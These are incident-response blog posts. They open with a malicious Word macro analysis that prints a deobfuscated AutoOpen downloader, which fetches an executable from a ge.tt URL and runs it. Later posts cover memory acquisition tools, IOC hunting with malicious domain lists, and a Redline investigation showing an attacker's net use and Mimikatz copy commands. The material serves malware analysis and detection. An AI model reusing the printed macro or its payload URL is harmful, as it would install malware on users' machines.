ggJnggfgHfgHdfG dfGdfGHHfGHH dDFCdFGBHVBhGjijok ghnfVBFGRTYJh fCvFgyhBgHHhFvB" Dim LotsofFuckingStringinallinOne As String LotsofFuckingStringinallinOne = "protection \ vulnerable worksheet wsc footage s rasberry student" Dim AnotherShitisHereSaysthis As String AnotherShitisHereSaysthis = "SbieCtrl encryption deauthentication hell ript. intrusion wireshark" Dim FinalWord As String FinalWord = CheckNumbers + Split(LotsofFuckingStringinallinOne)(4) + CheckNumbers + Split(AnotherShitisHereSaysthis)(4) S_var7 = Split(AnotherShitisHereSaysthis)(0) & Split(NewString)(3) S_var8 = "http://ge" & "." & "tt/api/1/files/2gmBurF2/0/blob?download" + CheckNumbers Dim IsProgramRegistered As String: IsProgramRegistered = FinalWord & Split(LotsofFuckingStringinallinOne)(6) S_var9 = CheckNumbers + CheckNumbers + CheckNumbers + "" + CheckNumbers + CheckNumbers S_var10 = S_var9 & S_var8 & "" S_var11 = S_var10 S_var12 = NewPath & Split(LotsofFuckingStringinallinOne)(1) & S_var7 + CheckNumbers S_var13 = S_var12 S_var14 = ProudtoBecomeaNepaliReverseEngineer(0, CheckNumbers + CheckNumbers + CheckNumbers + CheckNumbers + CheckNumbers + S_var11 & CheckNumbers & CheckNumbers & CheckNumbers, CheckNumbers & CheckNumbers & CheckNumbers & S_var12 & CheckNumbers & CheckNumbers, 0, 0) If Dir(S_var12) <> "" Then Dim O_var1 As Object Set O_var1 = CreateObject(IsProgramRegistered & Split(AnotherShitisHereSaysthis)(3)) Set O_var1 = O_var1.exec(S_var12) End If End Sub

Obfuscation seems to rely on string operations. Next step would be to perform all operations on String variables, for instance:

1 2 3
"a" + "b" == "ab" "c" & "" == "c" Split(LotsofFuckingStringinallinOne)(1) == "\"

After a few operations code becomes much more readable:

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43
Attribute VB_Name = "NewMacros" #If VBA7 Then Private Declare PtrSafe Function ProudtoBecomeaNepaliReverseEngineer Lib "urlmon" Alias "URLDownloadToFileA" _ (ByVal L_var1 As Long, ByVal S_var1 As String, ByVal S_var2 As String, ByVal L_var2 As Long, ByVal L_var3 As Long) As Long #Else Private Declare Function ProudtoBecomeaNepaliReverseEngineer Lib "urlmon" Alias "URLDownloadToFileA" _ (ByVal L_var4 As Long, ByVal S_var3 As String, ByVal S_var4 As String, ByVal L_var5 As Long, ByVal L_var6 As Long) As Long #End If Sub AutoOpen() Dim S_var5 As String Dim S_var6 As String S_var6 = CurDir() Dim NewPath As String NewPath = Replace(S_var6, "\Desktop", "\AppData\Roaming") NewPath = "C:\Users\Public\Documents" Dim CheckNumbers As String CheckNumbers = "" Dim S_var7 As String Dim NewString As String NewString = "Umbrella HBjhbhjkshdjkhJNggg GjHgggJkmNjh .exe GjNghJGjhJggggJh ggJnggfgHfgHdfG dfGdfGHHfGHH dDFCdFGBHVBhGjijok ghnfVBFGRTYJh fCvFgyhBgHHhFvB" Dim LotsofFuckingStringinallinOne As String LotsofFuckingStringinallinOne = "protection \ vulnerable worksheet wsc footage s rasberry student" Dim AnotherShitisHereSaysthis As String AnotherShitisHereSaysthis = "SbieCtrl encryption deauthentication hell ript. intrusion wireshark" Dim FinalWord As String FinalWord = "wscript." S_var7 = "SbieCtrl".exe" S_var8 = "http://ge.tt/api/1/files/2gmBurF2/0/blob?download" Dim IsProgramRegistered As String: IsProgramRegistered = "wscripts" S_var9 = "" S_var10 = "http://ge.tt/api/1/files/2gmBurF2/0/blob?download" S_var11 = "http://ge.tt/api/1/files/2gmBurF2/0/blob?download" S_var12 = "C:\Users\Public\Documents\SbieCtrl.exe" S_var13 = "C:\Users\Public\Documents\SbieCtrl.exe" S_var14 = ProudtoBecomeaNepaliReverseEngineer(0,"http://ge.tt/api/1/files/2gmBurF2/0/blob?download","C:\Users\Public\Documents\SbieCtrl.exe", 0, 0) If Dir(S_var12) <> "" Then Dim O_var1 As Object Set O_var1 = CreateObject("wscript.shell") Set O_var1 = O_var1.exec("C:\Users\Public\Documents\SbieCtrl.exe") End If End Sub

Code analysis summary:

AutoOpen() will be executed after the document is opened.

ProudtoBecomeNepaliReverseEngineer is just an alias to URLDownloadToFile()

URLDownloadToFile() accepts five parameters, including URL address http://ge.tt/api/1/files/2gmBurF2/0/blob?download and a file name C:\Users\Public\Documents\SbieCtrl.exe.

Both information serve as a network and host indicators that might be used to check for successful compromise.

Conclusions

It’s never a good option to rely on only one tool. Analyzing malicious documents is all about finding, extracting and analyzing malicious code. What would happen if bad guys used different obfuscation methods, document types or came up with new unknown technique? Would you be prepared with your current toolset? Having backup plan and additional tools in your toolset makes you ready for such scenario. In our short analysis OfficeMalScanner was not able to extract both streams correctly. What if this was your go to tool? Would you be able to perform analysis? I am not saying that any tool described in this post is better or worse than the other, all of them are great tools and allow you to do things differently it all really depends on your requirements. For instance officeparser.py and oledump.py allow you to interact with the file internals, however this might not be the most efficient approach if you have to analyze few documents where writing a while loop and using OfficeMalScanner or olevba.py to dump the malicious code will do the trick for you.

Never limit yourself to one tool, programming language or operating system. Be flexible and open-minded, have a backup plan, a proper toolset and you will be better prepared for the upcoming challenges!

DFIR.IT! on tour - CONFidence 2015 Cracow

2015-05-29T20:07:21+02:00

DFIR.IT on tour continues! This time we’ve decided to visit one of the longest-lasting and the best conferences in Poland. Expectations were high as it was our first event with all DFIR.IT members ready to roll, geek out and have fun. Unfortunately I am coming back a bit disappointed.

First and foremost

Big THANK YOU to :

CONFidence Team for creating the event

Dragon Sector Team for organizing CTF

Presenters for sharing research, ideas and thoughts

Attendees. Meeting open-minded people with passion is always an amazing experience x

Thoughts and observations

I wanted to use this section to describe the presentations that influence me in one way or another and are worth spreading. Please don’t get me wrong. It is not that there was nothing interesting at CONFidence this year. The last thing I intend to do is to sound like a troll or hater. There are a few things that CONFidence got me thinking about and I really need to get it off my chest.

Defense can be sexy?!

Defenders need to get better at making their work more visible. It’s tough! I know. You might have heard a few times phrase ‘Defense is not sexy’. Even I mentioned this in the past. But then again I am starting to realize that maybe we don’t put enough effort to make it interesting for others. Inspire people by showing how responding to real threats and defending customers is one of the biggest challenges in the industry. There’s an awful lot of young guys in my team with mindset of becoming pentesters because it’s cool to pop a shell here or there. I’ve seen people passing OSCP, which is not the easiest thing to do, and struggle to find evil. Defending is hard, defending is challenging, let’s make it more visible, interesting and inspiring!

Pentest != IR

I’ve seen a lot of brainy guys who were amazing pentesters that eventually got bored and transitioned into IR and were very successful at it. However it was a process - not something they did over night. The thing I am trying to emphasize here is just because you know how to attack does not mean you know how to defend. Pentesters can become awesome defenders but pentesters by default ARE NOT awesome defenders.

APT != ‘Advance(d)’ Penetration Testing

Please don’t say that just because you wrote your own piece of basic code that installs on the machine and beacons out, you are offering APT testing. Providing a service that is basically what industry understands as pentest with one or two things you got from random APT report is not fair towards your customers. Put more effort to either understand the concept of TTP based on the REAL case scenarios or if you don’t have access to such information, make new friends in the industry. Conferences like CONFidence are a great opportunity to do that! Guys who look at alerts and respond to incidents day in, day out will help you understand the biggest challenges companies face when defending against APT guys. It will make you a better pentester, give your customers a REAL value and provide defenders with an opportunity to share the experience. Win-Win-Win.

Presentations

Presenting is not easy. Important thing to remember is that you are presenting your research to someone (audience). Try to keep in mind that:

Awesome presentations are a mixture of good humor and technical stuff

Define your goal, emphasize main message, proof your point

Organize your thoughts in visible and interesting way

Ask a non-technical person to review your presentation, and ask if he/she enjoys the presentation ‘look and feel’

For the love of God! Catchy titles are nice but don’t exaggerate! If the main theme from your title is not the main topic of your presentations something went horribly wrong and people will be disappointed

Talks

Quality of talks and research (or lack of research!). We were trying to discuss the reasons why and came up with different ideas:

CTF is a new cool thing to do,

Quantity not Quality. There is just too many security conferences and often with two or more tracks

Vendors (sponsors) want to sell products - crypto marketing

Consulting companies (sponsors) want to sell services - crypto marketing

Don’t know…

Conclusions

The main reason why I felt in love with community is the wealth and availability of the information, research, tools, ideas, knowledge, collaboration which everyone can be part of and everyone can use. The main reason why we decided to create DFIR.IT is because we felt we want to give back to the community. I could give you plenty of examples how we helped different customers to not get cyber bullied, extorted or exfiltrated, just because some unnamed heroes carried out research, that someone turned into an amazing tool and shared with others! I cannot express my appreciation of those guys and everyone that tries to make a difference. Conferences are important part of community and a framework to meet, share and learn from each other. Let’s try to do whatever we can to keep it that way!

Memory acquisition tools for Windows

2015-04-20T22:58:52+02:00

Memory acquisition is usually the first step in digital forensics analysis. Before any analysis can be done, we need to acquire the memory in the first place. There are a number of commercial solutions to acquire memory, but there is also a few free and even open source equivalents.
In this article I am going to review four memory acquisition utilities designed to deploy on a USB stick for quick incident response operations.

Basic requirements:

free of charge

minimal memory footprint

portable (no installation required) and lightweight

x86 and x64 support

All tools were tested on my Windows7 x64 machine with 8GB of RAM. Let’s get started!

Magnet RAM Capture

Magnet RAM Capture is a new player in the market. Supports Windows systems including XP, Vista, 7, 8, 10, 2003, 2008, and 2012. Magnet RAM Capture has nice and simple GUI so running it is very straightforward. It creates a raw memory dump with a .DMP extension. If you are running the tool from a FAT32 formatted USB stick and the host RAM you are capturing is greater than 4 GB, then segmentation feature will be very helpful (it is disabled by default).

During my tests, Magnet RAM Capture allocated 2844K of memory.

Belkasoft Live RAM Capturer

Belkasoft Live RAM Capturer is compatible with all versions and editions of Windows including XP, Vista, Windows 7 and 8, 2003 and 2008 Server. The authors claim that they did their best to optimize memory usage. It is even available in separate 32-bit and 64-bit versions in order to minimize it’s footprint as much as possible. The tool comes equipped with kernel drivers allowing it to operate in the most privileged kernel mode. Thanks to GUI it is very simple to use. By default it stores memory image in current working directory. It creates a memory dump in RAW format. The name of the output file is the current system date with .MEM extension.

During my tests, 64-bit version of RAM Capturer allocated 2060K of memory.

MoonSols DumpIt

MoonSols DumpIt is a fusion of old win32dd and win64dd combined into new and improved executable. It is also part of MoonSols Windows Memory Toolkit. DumpIt offers an easy way of obtaining a memory image even if the investigator is not physically sitting in front of the target system. It is designed to be provided to a non-technical user. Only a double click on the executable and confirmation is enough to generate a copy of the physical memory in the current directory. A .RAW memory image named for the host name, date and UTC time will result.

Unfortunately free of charge version I used (1.3.2.20110401) is a few years old and is not developed any more. There is also commercial version available with LZNT1 compression and RC4 encryption features, but of course it is not free and therefore does not meet our basic requirements.

During my tests, DumpIt allocated only 780K of memory. Great result.

Rekall WinPMEM

WinPMEM is actively developed open source utility. It is part of Rekall Memory Framework. WinPMEM has never let me down. It acquired 64GB memory image from Windows 2008 Server. Compared to the previously described tools, WinPMEM has a number of interesting features:

output formats: RAW memory images and ELF Core dump files

output to STDOUT for piping through other tools like ssh, netcat, 7zip

memory acquisition using four different methods

optional write support for manipulating kernel data structures through \\.\pmem device

WinPMEM is slightly harder to use. It can be run only from command line which makes it ideal for scripting purposes. Your script can be deployed on a USB stick and do the job for you. My personal favourite feature is writing images to standard output (STDOUT). For example, you can use it to transfer memory image directly to a remote machine:

winpmem_1.6.2.exe - | nc 10.0.0.1 1234

Or to create a password protected archive on the fly:

winpmem_1.6.2.exe - | 7z a -si -bd -pSECRET

During my tests, WinPMEM allocated 1596K of memory. You need to remember that in combination with other tools like nc or 7z, memory consumption will be higher.

Memory consumption comparison

Well, the chart speaks for itself.

DFIR.IT! on tour - DFRWS 2015 Dublin

2015-04-08T23:16:41+02:00

First official tour of DFIR.IT team started on DFRWS in Dublin - we headed there to attend DFRWS EU 2015 conference. Amazing time in Dublin was accompanied by sunny(!) weather, a proper pint of Guinness and some time to geek out - a perfect combination!

First and foremost!

Big THANK YOU to:

all the speakers for SHARING their great research, interesting ideas, tools and projects.

organization committee. Someone who never organized a conference doesn’t realize the amount of work, effort and devotion required for events like DFRWS to become successful.

all the attendees - PEOPLE and ability to MEET and TALK with others are the secrets to great conference.

Workshops

DFRWS EU started with Digital Forensics Framework workshop - if you’ve never used this framework - go and play with it as soon as possible and consider DFF when building IR toolkit. DFF features include reconstruction of VMware ‘vmdk’ files, support for multiple operating systems (Windows, Linux, OS X) file formats, memory analysis and many more. Workshops could have been ideal if participant were allowed to downloaded forensic images and install software before the class started. Sharing all the data via USB sticks with dozens of people was not the best idea ;)

Next was The Decision and it was extremely difficult where to ‘take our talents next’. Rekall and GRR workshops were conducted in parallel. As a clever bastards we’ve decided to split and share the knowledge and materials. It turns out we were not clever enough, Micheal Cohen workshops quickly extended the available space in the room..

Nevertheless, Andreas Moser workshop was a great hands on introduction to GRR open source project. Workshop allowed participants to collect and analyze forensics artifacts and hunt for evil. GRR has all the features that Incident Responders want to have to quickly react and respond to threats. It took us few seconds after workshop to decide - we are setting up some testing infrastructure with GRR. Stay tuned for more GRR goodies on DFIR.IT

Conference

The Search for MH370: Lessons from Inmarsat’s Flightpath Reconstruction Analysis

Even though this was not a typical computer forensics topic, “The Search for MH370…” was amazing presentation that reminded principal rule: even without sufficient data, investigators should always find a way to perform analysis.

Hviz: HTTP(S) Traffic Aggregation and Visualization for Network Forensics

Researchers presented analytical approach how to filter out noise and aggregate data in order to detect data exfiltration. One of the most interesting research papers on DFRWS. Authors promised to released the code after the conference. For the time being you can play with demo version here.

Tor Forensics on Windows OS

Technical case study that outlined the artifacts left on the system by Tor Browser. Apart from standard forensics go to places (vss, registry, prefetch files, etc) authors focused on artifacts left in memory and pagefile.sys which can be found, for instance by looking for HTTP-memory-only-PB string. It might be interesting to compare the usage of all the artifacts created by browsers in terms of private browsing or incognito mode.

Fast and Generic Malware Triage using openioc_scan

Universal methodology of anomaly detection using memory IOC. Amount of data and artifacts stored in system memory snapshot allow openioc to detect UAC bypass, code injections, lateral movement and much more badness!

Characterization of the Windows Kernel version variability for accurate Memory analysis

Micheal Cohen focused on Windows Kernel version variability and its effect on memory analysis. One of the differences highlighted during presentation was that struct layout does not change within same minor versions which is not the case for kernel global constants. Fundamental differences between Rekall and Volatility is how frameworks build profiles and how struct layout and finding kernel global constants might not only affect quality but be more prone to errors and susceptible to anti-forensics.

Acquisition and Analysis of Compromised Firmware Using Memory Forensics.

Most of the memory acquisition tools will acquire memory marked as RAM by OS, which will skip firmware memory ranges. In the light of recent events (Equation group, MAC persistent backdoor) ability of collecting firmware memory might be essential for investigators. Authors presented that firmware acquisition can be achieved by parsing configurations spaces of PCI devices and enumerating all MIMO regions which would be excluded when acquiring memory. In addition to that authors build volatility plugin for dumping ACPI tables to file system.

Smart TV Forensics: Digital Traces on televisions

Researchers focused on investigating the digital traces found on SMART TVs. According to them, one of the biggest challenges is data acquisition. Even though, Smart TV from a hardware perspective is an embedded device, authors had to test different ways to obtain the data including eMMC five-wire method, NFI Memory Toolkit II and rooting the device. Analysis of the collected data allowed investigators to view system and network information, web browser and custom application activity.

Analyst's Handbook - Hunting with basic OSINT and command line fu

2015-04-06T21:53:45+02:00

There are plenty of blacklists available online. Building blacklists based detection often leads to high false positives rates which affects quality, increase workload and make alerts investigation more difficult. Primary reason is the lack of context. Context allows analysts to focus on what’s important and pivot from collected data in order to find more indicators and create better detection rules. Let’s explore how to hunt with Open Source Intelligence and command line fu to find evil and enhance detection with pattern matching rules.

Create the IOC list

For the sake of this example I’ve decided to use this list which includes IP addresses, domains and most importantly: context! Context should be part of every IOC list that you create. It doesn’t matter if the list is build based on known traffic patterns, OSINT research or tip off. Even though there might be additional overhead, having context will pay off in longer run.

List format example:

1 2 3 4 5 6 7 8 9 10
207.182.149.13,port 80,eturnstartsikkanese. and returnstartsikkanese.innovativeapplicationsblog.com,,Angler EK (2nd attempt from 2015-01-22),2015-01-22 207.182.149.13,port 80,governat.richdadradio.co.uk,,Angler EK (3rd attempt from 2015-01-22),2015-01-22 209.126.97.209,port 80,jyjhsvgkpeni0g.com,POST /,ET TROJAN Bedep Checkin Response,2015-01-22 188.138.25.107,port 80,drain.diskant.co.uk,POST /news.php,ET TROJAN Fareit/Pony Downloader Checkin 2,2015-01-22 173.224.126.19,port 80,asop83uyteramxop.com,,ET MALWARE Fun Web Products Spyware User-Agent (FunWebProducts),2015-01-22 83.69.233.133,port 8080,ipsalomenatep58highwayroad.biz:8080,,ET TROJAN Ursnif Checkin,2015-01-22 79.99.6.187,port 8080,79.99.6.187:8080,,ETPRO TROJAN Win32/Injector.BOIK Downloader Checkin,2015-01-22 188.40.64.218,port 80,n1hxftesfm3n4333ah61xnf.ajanshizmeti.com,,Windigo group Nuclear EK,2015-01-23 96.44.135.8,port 80,camhogger.com,,Compromised website,2015-01-23 188.226.180.82,port 80,instanthold.gq,,Nuclear EK,2015-01-23

Let’s start by extracting all the domains:

1 2 3 4 5 6 7 8 9 10 11
$ cat suspicious-ip-addresses-and-domains.txt | egrep -v `#` | cut -d `,` -f3 | tr `/` `\n` | sed `s/ and returnstartsikkanese.//` | sed `s/ and /\n/` | sed `s/8085and/8085\n/` | sed `s/www.//` | tr -d ` ` | sed `s/\[23characters\].//` | egrep . | sort -n | uniq > domains-IOC

For those who don’t feel comfortable with command line:

from list select all the lines excluding lines with # character

replace / with new line character \n

replace strings in the file (sed s/MatchString/ReplaceWithThisString)

remove space character

select lines that contain .

sort list and print unique entries results save to domains-IOC file

Extracted list of domains (part removed for brevity):

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16
brianpekarchuk.com burdiacs.com burtander.com butterflymedia.az californiainsuranceco.com callproc.com camhogger.com canadahalalec.com cannedseniordogfood.com captainblowdri.com caracolassn.com cast.autolistprofits.net celebrityvalley.com chcoa.com cityep.net themoviespoiler.com

Hunting

Now, we can use our list to search for evil in the proxy logs:

1
$ while read line; do egrep -i $line proxy-logs-20150130.log ; done < domains-IOC

For each line in the domains-IOC file the above code snippet will search for corresponding entry in the proxy log file.

If your SIEM solution or other detection platform allows you to access some backend that stores historic data about network connections you should consider yourself a lucky analyst. Let’s assume this backend allows you to use raw SQL queries. Body of such SQL query can be easily pre-generated with command line:

1
$ cat IOC-Domain | sed `s/.*/db_column_name="\0" OR/`

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15
db_column_name="brianpekarchuk.com" OR db_column_name="burdiacs.com" OR db_column_name="burtander.com" OR db_column_name="butterflymedia.az" OR db_column_name="californiainsuranceco.com" OR db_column_name="callproc.com" OR db_column_name="camhogger.com" OR db_column_name="canadahalalec.com" OR db_column_name="cannedseniordogfood.com" OR db_column_name="captainblowdri.com" OR db_column_name="caracolassn.com" OR db_column_name="cast.autolistprofits.net" OR db_column_name="celebrityvalley.com" OR db_column_name="chcoa.com" OR db_column_name="cityep.net" OR

Now the only thing left is to add a header with SELECT statement and a table name. This might be extremely useful and time saving especially if your list contains hundreds of entries!

Let’s assume you found malicious domains in your proxy logs - for instance a hit on a Sweet Orange gate:

1 2
200 TCP_NC_MISS GET themoviespolier.com 50.62.217.1 80 / http://www.google.com/url?url=http://www.themoviespoiler.com/&rct=j&frm=1&q=&esrc=s&sa=U&ei=KDnZVMbIN4eQyQTd8oKwCA&ved=0CBUQFjAA&usg=AFQjCNFJ3uEfi7Djoan_rZE88d15OulS9g DIRECT 200 TCP_NC_MISS GET static.matthewsfyi.com 50.87.151.146 80 /k?tstmp=3600039285 http://www.themoviespoiler.com/ DIRECT

This is where context kicks in:

1 2
$ egrep 50.87.151 suspicious-ip-addresses-and-domains.txt 50.87.151.146,port 80,static.matthewsfyi.com,,Redirect pointing to Sweet Orange EK,2015-02-09

with this information one click later analyst can review chain of the events.

In this case most probably redirect to EK page did not happen as there were no hits in proxy logs for the following URLs:

h.useditems.ca:8085

k.vidihut.com:8085

However with the context available an analyst knows exactly what to look for and how to determine whether activity was successful or not. It is definitely worth mentioning that EK gates stay active for a longer time, this in turn quite often leads to interesting findings like new compromised domains or landing pages. Just follow this example:

1 2
200 TCP_NC_MISS GET UnknownCompromisedWebsite.com 1.1.1.1 80 / - DIRECT 200 TCP_NC_MISS GET static.matthewsfyi.com 50.87.151.146 80 /k?tstmp=3600039285 hxxp://UnknownCompromisedWebsite.com/ DIRECT

Analysis of HTTP referer field provides information about previously unknown compromised domain.

Improving detection

Above queries allowed analysts to not only identify connections to bad domains but more importantly allowed them to use context to confirm/deny if traffic was indeed malicious and resulted in successful exploitation. That’s pretty cool! But hey, there’s more! Bad guys quite often will use a different C&C infrastructure for the same type of malware. Basically it is far more easier to change C&C for given malware sample rather than to re-code the communication function/method. This means that malware will use similar communication pattern when connecting to different C&C.

Enter pattern matching!

URL pattern matching is an effective way to detect the same type of network traffic communication even though bad guys use different IPs/domains. For instance let’s take a closer look at Cryptowall C&C.

1
$ egrep Crypto suspicious-ip-addresses-and-domains.txt | cut -d ',' -f4 | sort -n | uniq

Detection could be achieved with the following regular expression:

1
$ egrep '\.php\?[a-z]{1}=[a-z0-9]{12,16}?' http-logs.txt

Above expression will match .php? followed by:

one letter

equals sign

minimum twelve to maximum sixteen alphanumeric characters

This works for both real time detection and also hunting on historic data.

Happy Hunting!

Update

I’ve noticed the original list is no longer available on www.malware-traffic-analysis.net. You can grab a copy of the extracted domains list from GitHub if you want to play with it.

Building Incident Response Toolkit - Redline (part 2)

2015-04-04T16:15:18+02:00

Scenario

Network X is an isolated, highly secured and monitored part of the network where Nation’s Secrets are stored. Team responsible for monitoring the infrastructure reports suspicious activity on one of the servers WIN-UC6FN0KAUGQ (10.10.100.100) including failed authentication attempts, originating from a host within the same geographic location as network X. The suspected machine’s is WIN-569IC7NK834 (10.10.100.50). IR team was called to investigate. Reported time of the suspicious activity: 2015-01-28T19:30:24Z.

Data Collection and Analysis

Every investigation is all about getting as much context as possible. This gives handlers better understanding of what happened and in turn it influences decision what to do next. At this point the only available information are few suspicious authentication attempts. Data collected by Redline’s Comprehensive Collector would be the best option to start our initial investigation.

Collection steps include:

Incident Handler creates and sends collector to Administrator responsible for executing it on suspicious machine.

Administrator logs to box with temporary created account, and executes collector.

Archived results are sent to Incident Handler in a secure, predefined way (e.g. SFTP server).

Incident Handler downloads the file and start the analysis in a preconfigured Virtual Machine.

Analysis

Where do we start? Each investigation is different and each handler has its own style. For most of the investigation one of the following strategies should yield satisfactory results:

Timeline analysis (based on the time of suspicious activity)

Data analysis (based on information about suspicious activity)

Timeline analysis

This one is fairly simple the only requirement is to have approximate time of suspicious activity.

Build a timeline based on all collected data.

Set up a timeframe e.g. 30 minutes.

Review events that occurred within defined timeframe before and after the suspicious activity.

Look for anything that is out of ordinary.

Follow up on all suspicious events with additional investigation.

If nothing suspicious was found start again at step 2 and extend the timeframe.

Let’s test this approach in on our scenario.

Collected data can be loaded in Redline by double clicking the .mans file and selecting the type of investigation:

On the Analysis data panel select Timeline:

Redline will build the timeline based on all collected events. Next step is to define a TimeWrinkle which is a basic filter that will show only entries within defined time frame.

One of the Windows Event Log entries close to the time of suspicious activity correlates with the usage of explicit logon credentials by user PMac against the target machine.

Let’s see what happened before user PMac tried to authenticate.

Processes cmd.exe and conhost.exe were spawned by the user PMac two minutes before the explicit logon event. It might be worth checking memory ranges for conhost.exe as this process usually holds history of user’s activity in a Windows command line (this is true for Windows 7/2008R2 or higher, for earlier versions you should focus on csrss.exe memory ranges). Dumping memory for given process with Redline can be easily achieved. Double clicking on conhost.exe displays the process information page. Select MRI Report and hit Acquire Process Address Space (assuming collector acquired memory). All memory ranges for given process will be extracted in the background. Let’s not waste time and continue with the timeline analysis.

There was nothing interesting in the timeline until we stumbled across the following entry: suspicious m64.exe file in a root directory.

Next step would be to get the file and perform initial analysis. Unfortunately Redline collects information about the metadata of the files within filesystem. File would have to be extracted manually, for instance by the same administrator that run the collector (sometimes it is possible to extract files from the memory image using e.g Volatility).

Now it is time to take a closer look at what happened in our timeline after the explicit logon attempt occurred.

Initial report mentioned few suspicious logon attempts. Using search feature we can look for other explicit credentials events:

Apparently user PMac tried to use Rob’s account…

Mike’s account…

and Bob’s account against the target server:

Interestingly enough the time differences between the logons were very short and suggest more of an enumeration activity.

Let’s get rid of the filter and examine closely all related entries for each explicit credentials event log entry. Nothing interesting for the first two logons, however entries surrounding third explicit logon give us more details. Registry changes suggest some sort of network activity, which might be related to accessing a network share on our protected target server by user Bob-ADC. This doesn’t look good at all!

Let’s summarize the findings of our analysis so far:

The file m64.exe was present in the root directory on WIN-569IC7NK834 (10.10.100.50) before suspicious logon started.

Followed by authentication attempts using four different sets of credentials against protected target server WIN-UC6FN0KAUGQ (10.10.100.100).

Evidence suggesting mounting a remote network share (root directory) on the protected server WIN-UC6FN0KAUGQ (10.10.100.100) was recorded in the Windows registry on WIN-569IC7NK834 (10.10.100.50).

There is still plenty of stuff to investigate further. What about the conhost.exe memory ranges? Redline finished dumping the files to disk after few minutes so it’s time to review memory ranges with good old strings.exe from Sysinternals.

After endless scrolling through strange hex, numbers and letters eventually a needle in a haystack was found! Strings inside the conhost.exe process memory revealed commands executed on the host WIN-569IC7NK834 (10.10.100.50) by user PMac (everyone loves memory forensics!):

C:\Users\PMac.LAB>net view Server Name Remark ---------------------------------------------------------------- \\WIN-569IC7NK834 Lab-Desktop \\WIN-UC6FN0KAUGQ Secure-Lab1 The command completed successfully. C:\Users\PMac.LAB>net use X: \\WIN-UC6FN0KAUGQ\C$ The password is invalid for \\WIN-UC6FN0KAUGQ\C$. Enter the user name for 'WIN-UC6FN0KAUGQ': PMac Enter the password for WIN-UC6FN0KAUGQ: System error 5 hasoccurred. Access is denied. C:\Users\PMac.LAB>net use X: \\WIN-UC6FN0KAUGQ\C$ The password is invalid for \\WIN-UC6FN0KAUGQ\C$. Enter the user name for 'WIN-UC6FN0KAUGQ': Rob-ADC Enter the password for WIN-UC6FN0KAUGQ: System error 5 hasoccurred. Access is denied. C:\Users\PMac.LAB>net use X: \\WIN-UC6FN0KAUGQ\C$ The password is invalid for \\WIN-UC6FN0KAUGQ\C$. Enter the user name for 'WIN-UC6FN0KAUGQ': Mike-ADC Enter the password for WIN-UC6FN0KAUGQ: System error 5 hasoccurred. Access is denied. C:\Users\PMac.LAB>net use X: \\WIN-UC6FN0KAUGQ\C$ The password is invalid for \\WIN-UC6FN0KAUGQ\C$. Enter the user name for 'WIN-UC6FN0KAUGQ': Bob-ADC Enter the password for WIN-UC6FN0KAUGQ: The command completed successfully. C:\Users\PMac.LAB>dir X: Volume in drive X has no label. Volume Serial Number is 16EE-2261 Directory of X\ 01/25/2015 04:43 PM inetpub 07/14/2009 03:20 AM PerfLogs 01/25/2015 05:19 PM Program Files 01/25/2015 04:28 PM Program Files (x86) 01/25/2015 05:41 PM Users 01/25/2015 06:55 PM Windows 0 File(s) 0 bytes 6 Dir(s) 16,423,743,488 bytes free C:\Users\PMac.LAB>xcopy C:\m64.exe X:\ /K C:\m64.exe 1 File(s)copied C:\Users\PMac.LAB>dir X: Volume in drive X has no label. Volume Serial Number is 16EE-2261 Directory of X:\ 01/25/2015 04:43 PM inetpub 11/20/2010 09:29 PM 302,592 m64.exe 07/14/2009 03:20 AM PerfLogs 01/25/2015 05:19 PM Program Files 01/25/2015 04:28 PM Program Files (x86) 01/25/2015 05:41 PM Users 01/25/2015 06:55 PM Windows 1 File(s) 302,592 bytes 6 Dir(s) 16,426,651,648 bytes free
So what exactly happened here? Someone tried to view the available network resources with the net view command and then failed to mount a remote share using different accounts (PMac, Rob-ADC, Mike-ADC). The last attempt using Bob-ADC credentials successfully mounted network share. After that the attacker copied suspicious file m64.exe to remote location. If the file was not suspicious enough when we’ve looked at it for the first time, now it would be really good to speed up our malware analysts to get as much information as possible regarding the file. Creating an IOC Building IOCs is based on the Boolean logic and keywords. For instance we can use Event Log ID 4648 to look for any existence of explicit credentials in Event log: Let’s assume that malware analyst came back with the results: m64.exe is recompiled version of Mimikatz - a well known password dumping tool. For instance an IOC can be built based on the name for both 32 and 64 bit platforms, extension and MD5. Hunting with IOCs In real case scenario this would be a good time to gather all the findings from the initial investigation and sweep across estate for more machines that indicate similar suspicious activity. It would be a good starting point to extract all activity of compromised accounts from the Domain Controller and run IOC collectors on all machines where any of those accounts were recorded. It might be worth considering to add collection of all event logs and/or memory to your collector. When analyzing the data collected by the IOC Collector open the analysis file and select: Select the folder with IOCs: Choose IOCs: The report will be generated in the background. When it is ready click the IOC Report on the bottom left side and review your IOC report. You found more indicators of compromise on other machines? Cool now you can iterate through our process with the new findings.. Repeat the same process over and over again in order to understand what exactly happened. Eventually this will allow you to get rid of the bad guys, sharpen your tools and be more prepared for another round! Feel free to stick around for part 3 of the series if you want to learn more about other tools to analyze data collected by Redline.
Building Incident Response toolkit - Redline (part 1) 2015-04-04T14:45:15+02:00 Well it happened. You are working as a full time Incident Responder or it might be that you are working as a consultant and use your knowledge and expertise only whenever security incident hits your organization. Never mind the details, incident is declared! Someone is inside your network, it all started with information about strange behavior - suspicious logon attempts from different admin accounts to your highly secured part of a network. One of the servers used for unsuccessful logon attempts contained suspicious executable which after short initial analysis seems to be well known password dumping tool. Insider? APT? Management is highly interested, pressure is growing. Someone may think: ‘Yep just another day of an Incident Handler’ In a perfect world, you would be working for an organization that has all the tools and processes in place. You grab your jump bag, take your corporate credit card and go directly on site to investigate. No? So your company only does it remotely? Fair enough. No time to be wasted - you need to verify information and start to analyze artifacts in order to recreate what happened. You are able to remotely collect valuable data from the endpoints, perform initial assessment, review monitoring platforms, sweep estate for initial indicators, perform basic memory and file system forensics, analyze netflows, logs and finally build timelines. At the end of the day, when you have more knowledge about what happened, you can update management and plan your next steps. Say Whaaaat? You don’t have any tools because there was no budget? You do not have a full coverage of the environment with your monitoring platforms? Management decided to use endpoint security only for the most protected part of the infrastructure and you do not have access and visibility? Your organization decided to offshore infrastructure to managed services provider and you need to collaborate with technical teams from different organization? Pick your reason. If it makes you feel better even add your own. We live in a Murphy’s Universe. You will probably never have everything you need and yes, you can blame management and complain or you can have fun and investigate potential incident and do some cool stuff. You just need to build alternative toolset and processes as a plan B (or build it as your primary toolset if you are really screwed up and 